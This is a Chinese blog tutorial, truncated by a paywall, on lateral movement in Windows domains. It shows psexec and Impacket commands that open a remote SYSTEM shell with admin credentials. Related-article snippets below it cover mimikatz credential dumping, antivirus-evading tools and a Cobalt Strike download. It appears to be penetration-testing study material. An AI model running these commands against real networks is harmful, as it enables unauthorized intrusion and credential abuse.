内网渗透-横向移动外部工具的使用

已于 2023-01-20 00:28:27 修改
阅读量2.2k 收藏 6
点赞数 1
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-10-01 01:24:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/127074136
版权
本文详细介绍了内网渗透中横向移动的技术,包括psexec、Smbexec、Wmiexec、msf模块和cs模块的使用,重点讨论了如何利用这些工具在域环境中进行权限提升和横向移动,以达到控制其他主机的目的。
摘要由CSDN通过智能技术生成

横向移动外部工具的使用

前言

文章目录

psexec

首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话
在已获得的shell中输入
net use \192.168.52.141 /user:administrator “密码”

(1)psexec
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec使用
建立IPC连接,无需输入密码
net use \192.168.52.141 /user:administrator “密码”

反弹cmd
psexec.exe \192.168.52.141 -s cmd.exe -acceptcula

执行命令
psexec.exe \192.168.52.141 whoami -acceptcula

psexec.py
与官方psexec.exe相比会自动删除服务,增加隐蔽性
psexec.exe god/Administrator:hongrisec@2019@192.168.52.141 whoami Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

psexec.py<

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
专栏目录
订阅专栏
内网渗透-内置工具横向移动
lza20001103的博客
10-01 1246
内置工具横向移动 文章目录内置工具横向移动前言IPCSchtasksIPC+ATIPC+SC后记 前言 前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动工具使用。 IPC IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view 当前的域有哪些主机 net use 查看当前是否有
内网横向渗透神器-CS
qq_39756628的博客
06-22 2501
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
windows外部工具横向移动
weixin_43873557的博客
02-10 514
01. Psexec PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 下载地址:https://docs.microsoft.com/zhcn/sysinternals/downloads/psexec 原理: 建立IPC连接,使用Psexec无需输入密码 第一次运行会弹框, 加 -accepteula 参数可绕过 -c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除) -d 不
内网渗透横向移动&IPC横移&Impacket套件&CS插件
2301_76227305的博客
07-31 858
以上便是IPC横移的知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
一款内网横向渗透辅助工具
weixin_46211944的博客
08-04 685
配合使用工具(如Mimikatz)扫描本地密码,并将密码写入source/pass_list.txt 以下工具(1)简称(1)(1)检测域。检测到域后,工具(2)自动使用 “net user /domain”等语法检测判断域用户(3)探索其他存活域主机:自动将网段IP信息写入source/ip_list.txt)语法:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I |findstr "TTL="(4)将本机wifi密码并输出至屏幕。...
安全(3)相关工具在内网横向移动中的运用
weixin_51339377的博客
03-27 770
1.mimikatz在内网中的使用 域环境下用户的信息储存在ntds.dit中 加密后为散列值 windows密码一般由两部分 LM Hash + NTLM Hash user1:RID:LM-HASH:NT-HASH 1.在kali中输入mimikatz可以获取该工具的地址 /usr/share/windows-resources/mimikatz 2.只需要把mimikatz文件夹下的x64复制到目标计算机上即可 3.接下来在msf中的system权限下对该计算机..
windows内置工具横向移动
weixin_43873557的博客
02-10 512
01. IPC+Schtasks IPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 利用条件 开放了139、445端口; 目标开启IPC$文件共享服务 需要目标机器的管理员账号和密码 连接 net use \10.10.10.201\ipc$ /user:administrator “1qaz@
免杀横向移动工具WMIHACKER
XXR_Beta的博客
07-04 1964
免杀横向移动工具WMIHACKER交互式Shell命令执行文件上传文件下载 免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。 其通过135端口进行命令执行,执行的结果读取以及无需445端口进行文件传输。此工具利用的前提条件是: 获取到目标主机的账户密码 可能会有人问既然我都拿到主机的账号密码,我远程直接登录不香吗?那远程桌面连接是不是需要开
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
这些方法揭示了内网渗透的常见步骤和工具,了解这些技术对于加强网络安全至关重要。防御者应定期进行安全审计和更新防御策略,以对抗潜在的威胁。通过红蓝对抗,企业可以发现自身弱点,及时修复,提升整体安全态势。
细说内网横向工具WMIHACK
Lsec的博客
07-11 1993
1.前言 此工具为香山大佬开源的一款内网横向渗透工具,阅读源码后被大佬的思路及所使用的技术细节所震撼,并始终认为对于wmi没有一定了解是无法写出如此精妙的代码,获益良多。本文不对工具使用做太多讲解,关于使用网上的文章已经太多了,只探讨背后的技术细节。 项目地址:https://github.com/360-Linton-Lab/WMIHACKER 1 基础知识 2.1 WMI简介 WMI 的全称是 Windows Management Instrumentation,即 Windows 管理
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
CheeseTools:自行开发的横向移动代码执行工具
08-05
Cheese工具 这个存储库是基于已经存在的,非常发布它们并给我正确的动力来处理它们。 CheeseExec 通过类似 PsExec 的功能命令执行 / 横向移动。 必须在特权用户的上下文中运行。 该工具基于 CsExec,但旨在允许对服务创建进行额外控制,特别是: 创建(搜索服务是否存在,如果不存在,尝试创建) 启动(搜索服务是否存在并停止,如果是这种情况尝试启动它;如果没有,尝试创建它并启动它) 停止(搜索服务是否存在并正在运行,如果是这种情况尝试停止它) 删除(搜索服务是否存在并正在运行,如果是这种情况,则尝试停止它而不是删除它,否则将其删除) CheeseExec.exe <targetMachine> <serviceName> <binPath> <action> 另请参阅 。 奶酪PS Cheese PS 是命令执行/横向移动框架。 它依赖System.Mana
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 336
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
横向移动工具-impacket-gui(一)
siu~
09-04 307
一款内网横向移动图形化工具
内网渗透-内网横向移动的九种方式
lza20001103的博客
04-14 1916
内网横向移动的九种方式
嘎嘎好用的内网横向移动工具
最新发布
qq_69775412的博客
08-08 339
日常项目中,同事吐槽在进行内网横向的时候老是输命令输命令,贼烦。问问能不能整个图形化页面,然后就有了本项目。
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4716
作者:WHOAMI,转载于freebuf。 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
SharpSCCM:一款利用SCCM实现横向渗透的强大工具
FreeBuf_的博客
12-20 477
SharpSCCM是一款功能强大的横向渗透和凭证收集工具,该工具主要利用了微软终端配置管理器(SCCM)来实现其功能,并能够通过访问SCCM管理终端GUI来实现横向渗透和凭证收集。
内网渗透--DNS隧道
05-16
在DNS隧道中,攻击者利用内网中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的域名字段中。外部DNS服务器接收到DNS请求消息后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值